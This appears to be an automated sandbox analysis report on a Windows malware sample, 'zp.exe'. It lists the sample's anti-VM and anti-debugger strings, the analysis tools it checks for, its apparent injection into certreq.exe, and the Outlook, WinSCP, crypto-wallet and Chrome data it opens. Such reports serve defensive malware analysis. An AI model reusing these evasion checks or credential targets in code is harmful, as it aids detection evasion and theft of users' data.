          Source: zp.exe, 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WQLRANDOMRANDOM NAME%THISISANINVALIDFILENAME?[]<>@\;*!-{}#:/~%%THISISANINVALIDENVIRONMENTVARIABLENAME?[]<>@\;*!-{}#:/~%CMDVRT32.DLLCMDVRT64.DLLWPESPY.DLLVMCHECK.DLLPSTOREC.DLLDIR_WATCH.DLLAPI_LOG.DLLDBGHELP.DLLSBIEDLL.DLLSNXHK.DLLAVGHOOKA.DLLAVGHOOKX.DLLTESTAPP.EXEMYAPP.EXEKLAVME.EXETEST.EXEMALWARE.EXESANDBOX.EXEBOT.EXESAMPLE.EXEJOHN DOEVIRUSTEST USERMALTESTMALWARESAND BOXUSERTIMMYPETER WILSONMILOZSMILLERJOHNSONIT-ADMINHONG LEEHAPUBWSEMILYSANDBOXCURRENTUSERTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PCHAL9TH7SILVIAXPAMAST-SCSANDBOXWILBERT-SCCWSXXXXX-OXNMSDBOXCUCKOOCOMPUTERNAMEANDYANONYMOUSUSERC:\A\FOOBAR.GIFC:\A\FOOBAR.DOCC:\A\FOOBAR.BMPC:\123\EMAIL.DOCXC:\123\EMAIL.DOCC:\EMAIL.HTMC:\EMAIL.DOCC:\LOADDLL.EXEC:\TAKE_SCREENSHOT.PS1JOHNKLONE_X64-PCSYSTEMITADMINSWSCWILBERNUMBEROFCORESSELECT * FROM WIN32_PROCESSORROOT\CIMV2VIRTUALQEMUVMWAREVBOXVBOXVBOXVBOXPARALLELS HVPRL HYPERV XENVMMXENVMMVMWAREVMWAREMICROSOFT HVKVMKVMKVMA M IVIRTUALXEN0PARALLELSVMWARESERIALNUMBERSELECT * FROM WIN32_BIOSHVM DOMUVIRTUALBOXMODELSELECT * FROM WIN32_COMPUTERSYSTEMQEMUINNOTEK GMBHMANUFACTURERPROCESSORIDVMWXENVIRTIOSYSTEM\CURRENTCONTROLSET\ENUM\SCSISYSTEM\CURRENTCONTROLSET\ENUM\IDESELECT * FROM CIM_PHYSICALCONNECTOR06/23/99SYSTEMBIOSDATEVIRTUALBOXVIDEOBIOSVERSIONSYSTEMBIOSVERSIONIDENTIFIERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DESCRIPTION\SYSTEMVBOXSYSTEM\CONTROLSET001\SERVICES\VBOXVIDEOSYSTEM\CONTROLSET001\SERVICES\VBOXSFSYSTEM\CONTROLSET001\SERVICES\VBOXSERVICESYSTEM\CONTROLSET001\SERVICES\VBOXMOUSESYSTEM\CONTROLSET001\SERVICES\VBOXGUESTSOFTWARE\ORACLE\VIRTUALBOX GUEST ADDITIONSHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__SYSTEM32\VBOXCONTROL.EXESYSTEM32\VBOXTRAY.EXESYSTEM32\VBOXSERVICE.EXESYSTEM32\VBOXOGLPASSTHROUGHSPU.DLLSYSTEM32\VBOXOGLPACKSPU.DLLSYSTEM32\VBOXOGLFEEDBACKSPU.DLLSYSTEM32\VBOXOGLERRORSPU.DLLSYSTEM32\VBOXOGLCRUTIL.DLLSYSTEM32\VBOXOGLARRAYSPU.DLLSYSTEM32\VBOXOGL.DLLSYSTEM32\VBOXMRXNP.DLLSYSTEM32\VBOXHOOK.DLLSYSTEM32\VBOXDISP.DLLSYSTEM32\DRIVERS\VBOXVIDEO.SYSSYSTEM32\DRIVERS\VBOXSF.SYSSYSTEM32\DRIVERS\VBOXGUEST.SYSSYSTEM32\DRIVERS\VBOXMOUSE.SYS%PROGRAMW6432%\\.\PIPE\VBOXTRAYIPC\\.\VBOXTRAYIPC\\.\PIPE\VBOXMINIRDDN\\.\VBOXGUEST\\.\VBOXMINIRDRDNVBOXTRAYTOOLWNDVBOXTRAYTOOLWNDCLASSVIRTUALBOX SHARED FOLDERSVBOXTRAY.EXEVBOXSERVICE.EXEPCI\VEN_80EE&DEV_CAFEDEVICEIDSELECT * FROM WIN32_PNPENTITYOPENHCD82371SB82441FX82801FBNAMEVEN_VBOXPNPDEVICEIDCAPTIONSELECT * FROM WIN32_PNPDEVICEPNP_BUS_0PCI_BUS_0ACPIBUS_BUS_0SELECT * FROM WIN32_BUSORACLE CORPORATIONPRODUCTSELECT * FROM WIN32_BASEBOARDSOURCESSYSTEMFILENAMESELECT * FROM WIN32_NTEVENTLOGFILEVBOXWDDMVBOXVIDEOW8VBOXVIDEOVBOXVBOXVIRTUALBOXSYSTEMPRODUCTNAMESYSTEMMANUFACTURERHARDWARE\DEVICEMAP\SCSI\SCSI PORT 2\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0HARDWARE\DEVICEMAP\SCSI\SCSI PORT 1\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0SYSTEM\CONTROLSET001\CONTROL\SYSTEMINFORMATIONVMWARESOFTWARE\VMWARE, INC.\VMWARE TOOLSVMACTHLP.EXEVGAUTHSERVICE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
          Source: zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCEXP.EXEPROCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXEPROCMON64.EXEVMMAP.EXEVMMAP64.EXEPORTMON.EXEPROCESSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHACKER.EXEIDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE*P
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
          Source: zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3SSLASSO.EXEWIRESHARK.EXEFIDDLER EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEWINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHACKER.EXEIDAQ64.EXEAUTORUNS.EXEDUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
          Source: zp.exe, 00000000.00000002.5771287849.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: zp.exe, 00000000.00000002.5771287849.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPC{
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDANR.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
          Source: C:\Users\user\Desktop\zp.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
          Source: C:\Users\user\Desktop\zp.exe TID: 7064Thread sleep count: 1315 > 30Jump to behavior
          Source: C:\Users\user\Desktop\zp.exeThread sleep count: Count: 1315 delay: -5Jump to behavior
          Source: C:\Users\user\Desktop\zp.exeWindow / User API: threadDelayed 1315Jump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\vboxservice.exeJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\vboxtray.exeJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxMouse.sysJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxSF.sysJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\vboxhook.dllJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosDateJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxVideo.sysJump to behavior
          Source: C:\Users\user\Desktop\zp.exeFile opened / queried: C:\Windows\SysWOW64\drivers\VBoxGuest.sysJump to behavior
          Source: C:\Users\user\Desktop\zp.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Windows\System32\certreq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00405FE2 FindFirstFileA,FindClose,0_2_00405FE2
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_0040559E CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_0040559E
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
          Source: C:\Users\user\Desktop\zp.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\zp.exeAPI call chain: ExitProcess graph end nodegraph_0-4474
          Source: C:\Users\user\Desktop\zp.exeAPI call chain: ExitProcess graph end nodegraph_0-4310
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
          Source: zp.exe, 00000002.00000003.6291719011.0000000032CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools,Co
          Source: zp.exe, 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\System32\vboxmrxnp.dll
          Source: zp.exe, 00000000.00000002.5771287849.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exepC{
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\System32\drivers\VBoxMouse.sys
          Source: zp.exe, 00000002.00000002.6347310970.0000000003668000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpAm
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: zp.exe, zp.exe, 00000002.00000002.6347310970.00000000036CA000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283703653.00000000036CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: zp.exe, 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\System32\vboxtray.exef
          Source: zp.exe, 00000002.00000003.6291719011.0000000032CD1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: zp.exe, 00000000.00000002.5771287849.00000000006CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: zp.exe, 00000002.00000002.6347310970.00000000036CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\VBoxGuest
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files (x86)\qemu-ga
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: zp.exe, 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WQLrandomRandom name%ThisIsAnInvalidFileName?[]<>@\;*!-{}#:/~%%ThisIsAnInvalidEnvironmentVariableName?[]<>@\;*!-{}#:/~%cmdvrt32.dllcmdvrt64.dllwpespy.dllvmcheck.dllpstorec.dlldir_watch.dllapi_log.dlldbghelp.dllsbiedll.dllsnxhk.dllavghooka.dllavghookx.dlltestapp.exemyapp.exeklavme.exetest.exemalware.exesandbox.exebot.exesample.exeJohn Doevirustest usermaltestmalwaresand boxusertimmyPeter WilsonmilozsMillerJohnsonIT-ADMINHong LeeHAPUBWSEmilySandboxCurrentUserTEQUILABOOMBOOMFORTINETWIN7-TRAPSMUELLER-PCJOHN-PCHANSPETER-PCHAL9TH7SILVIAXPAMAST-SCSANDBOXWILBERT-SCCWSXXXXX-OXNMSDBOXCUCKOOCOMPUTERNAMEANDYAnonymousUSERC:\a\foobar.gifC:\a\foobar.docC:\a\foobar.bmpC:\123\email.docxC:\123\email.docC:\email.htmC:\email.docC:\loaddll.exeC:\take_screenshot.ps1JohnKLONE_X64-PCSystemITadminSWSCWilberNumberOfCoresSELECT * FROM Win32_ProcessorROOT\CIMV2virtualqemuvmwarevboxVBoxVBoxVBoxParallels Hvprl hyperv XenVMMXenVMMVMwareVMwareMicrosoft HvKVMKVMKVMA M IVirtualXen0ParallelsVMWareSerialNumberSELECT * FROM Win32_BIOSHVM domUVirtualBoxModelSELECT * FROM Win32_ComputerSystemQEMUinnotek GmbHManufacturerProcessorIdVMWxenvirtioSystem\CurrentControlSet\Enum\SCSISystem\CurrentControlSet\Enum\IDESELECT * FROM CIM_PhysicalConnector06/23/99SystemBiosDateVIRTUALBOXVideoBiosVersionSystemBiosVersionIdentifierHARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\Description\SystemVBOXSYSTEM\ControlSet001\Services\VBoxVideoSYSTEM\ControlSet001\Services\VBoxSFSYSTEM\ControlSet001\Services\VBoxServiceSYSTEM\ControlSet001\Services\VBoxMouseSYSTEM\ControlSet001\Services\VBoxGuestSOFTWARE\Oracle\VirtualBox Guest AdditionsHARDWARE\ACPI\RSDT\VBOX__HARDWARE\ACPI\FADT\VBOX__HARDWARE\ACPI\DSDT\VBOX__System32\VBoxControl.exeSystem32\vboxtray.exeSystem32\vboxservice.exeSystem32\vboxoglpassthroughspu.dllSystem32\vboxoglpackspu.dllSystem32\vboxoglfeedbackspu.dllSystem32\vboxoglerrorspu.dllSystem32\vboxoglcrutil.dllSystem32\vboxoglarrayspu.dllSystem32\vboxogl.dllSystem32\vboxmrxnp.dllSystem32\vboxhook.dllSystem32\vboxdisp.dllSystem32\drivers\VBoxVideo.sysSystem32\drivers\VBoxSF.sysSystem32\drivers\VBoxGuest.sysSystem32\drivers\VBoxMouse.sys%ProgramW6432%\\.\pipe\VBoxTrayIPC\\.\VBoxTrayIPC\\.\pipe\VBoxMiniRdDN\\.\VBoxGuest\\.\VBoxMiniRdrDNVBoxTrayToolWndVBoxTrayToolWndClassVirtualBox Shared Foldersvboxtray.exevboxservice.exePCI\VEN_80EE&DEV_CAFEDeviceIdSELECT * FROM Win32_PnPEntityOpenHCD82371SB82441FX82801FBNameVEN_VBOXPNPDeviceIDCaptionSELECT * FROM Win32_PnPDevicePNP_BUS_0PCI_BUS_0ACPIBus_BUS_0SELECT * FROM Win32_BusOracle CorporationProductSELECT * FROM Win32_BaseBoardSourcesSystemFileNameSELECT * FROM Win32_NTEventlogFileVBoxWddmVBoxVideoW8vboxvideoVBOXvboxVirtualBoxSystemProductNameSystemManufacturerHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0SYSTEM\ControlSet001\Control\SystemInformationVMWARESOFTWARE\VMware, Inc.\VMware Toolsvmacthlp.exeVGAuthService
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: zp.exe, 00000002.00000003.6285988556.00000000000D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: zp.exe, 00000002.00000002.6347310970.00000000036AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Windows\System32\vboxservice.exeoL
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: zp.exe, 00000000.00000002.5831223661.0000000010059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00406009 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406009
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_0007026A mov eax, dword ptr fs:[00000030h]2_3_0007026A
          Source: C:\Users\user\Desktop\zp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\zp.exeCode function: 2_3_000702BF LocalAlloc,LdrInitializeThunk,VirtualAlloc,LocalFree,2_3_000702BF
          Source: C:\Users\user\Desktop\zp.exeProcess created: C:\Windows\System32\certreq.exe C:\Windows\system32\certreq.exeJump to behavior
          Source: C:\Windows\System32\certreq.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\certreq.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
          Source: C:\Windows\System32\certreq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\zp.exeCode function: 0_2_00405D00 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D00
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tcpview.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Wireshark.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lordpe.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Procmon.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autoruns.exe
          Source: zp.exe, 00000002.00000003.5749632530.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6282989504.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.5790556301.000000003397E000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003396D000.00000004.00000020.00020000.00000000.sdmp, zp.exe, 00000002.00000003.6283407634.000000003397E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regmon.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: zp.exe PID: 7940, type: MEMORYSTR
          Source: C:\Windows\System32\certreq.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
          Source: C:\Windows\System32\certreq.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
          Source: C:\Windows\System32\certreq.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
          Source: C:\Windows\System32\certreq.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
          Source: C:\Windows\System32\certreq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
